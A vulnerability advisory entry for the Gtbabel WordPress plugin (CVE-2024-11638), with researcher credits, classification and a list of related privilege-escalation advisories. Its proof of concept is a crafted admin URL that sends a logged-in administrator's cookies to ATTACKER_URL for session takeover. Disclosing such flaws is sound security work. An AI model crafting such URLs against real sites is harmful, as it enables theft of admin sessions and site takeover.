Gtbabel < 6.6.9 – Unauthenticated Admin Account Takeover | CVE 2024-11638 | Plugin Vulnerabilities

Description

The plugin does not ensure that the URL to perform code analysis upon belongs to the blog which could allow unauthenticated attackers to retrieve a logged in user (such as admin) cookies by making them open a crafted URL as the request made to analysed the URL contains such cookies.

Proof of Concept

Make a logged in admin open the following URL: https://example.com/wp-admin/admin.php?page=gtbabel-trans&url=ATTACKER_URL%3fa=https://example.com

This will make a request to the attacker's URL with the WordPress cookies, which then be used to login as the admin

Affects Plugins

Fixed in 6.6.9

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Hassan Khan Yusufzai - Splint3r7

Submitter

Hassan Khan Yusufzai - Splint3r7

Submitter website

https://hassankhanyusufzai.com

Submitter twitter

Verified

Yes

WPVDB ID

2f20336f-e12e-4b09-bcaf-45f7249f6495

Timeline

Publicly Published

2025-02-17 (about 10 months ago)

Added

2025-02-17 (about 10 months ago)

Last Updated

2025-02-17 (about 10 months ago)

Other

Published

Title

Published

2018-10-11

Title

WooCommerce <= 3.4.5 - Authenticated File Deletion to Privilege Escalation

Published

2024-10-09

Title

UserPlus <= 2.0 - Unauthenticated Privilege Escalation

Published

2023-05-22

Title

Leyka < 3.30.3 - Subscriber+ Privilege Escalation

Published

2018-09-04

Title

Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation

Published

2025-07-31

Title

DELUCKS SEO < 2.6.1 - Authenticated (Subscriber+) Privilege Escalation